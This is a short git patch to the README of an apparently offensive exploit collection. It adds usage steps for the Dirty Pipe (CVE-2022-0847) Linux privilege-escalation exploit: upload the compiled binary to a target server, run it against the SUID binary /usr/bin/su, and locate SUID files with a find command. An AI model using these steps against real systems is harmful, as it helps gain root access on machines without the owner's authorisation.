From 01259a5cfc4f783f1511dbf20088682c1edb0c7e Mon Sep 17 00:00:00 2001 From: helloexp <21156949+helloexp@users.noreply.github.com> Date: Thu, 15 Jun 2023 14:28:45 +0800 Subject: [PATCH] add usage for CVE-2022-0847 --- 98-Linux提权/CVE-2022-0847-DirtyPipe提权/README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/98-Linux提权/CVE-2022-0847-DirtyPipe提权/README.md b/98-Linux提权/CVE-2022-0847-DirtyPipe提权/README.md index 584d1ed..eb02639 100644 --- a/98-Linux提权/CVE-2022-0847-DirtyPipe提权/README.md +++ b/98-Linux提权/CVE-2022-0847-DirtyPipe提权/README.md @@ -20,4 +20,8 @@ bash Dirty-Pipe.sh ```shell gcc pipesource.c -o pipesource ``` -然后直接将 `pipesource` 上传到目标服务器运行 +然后直接将 `pipesource` 上传到目标服务器运行 `./pipsource /usr/bin/su` + +其中 `/usr/bin/su` 为具有suid 权限的文件 +搜索方法如下: +`find / -perm -u=s -type f` \ No newline at end of file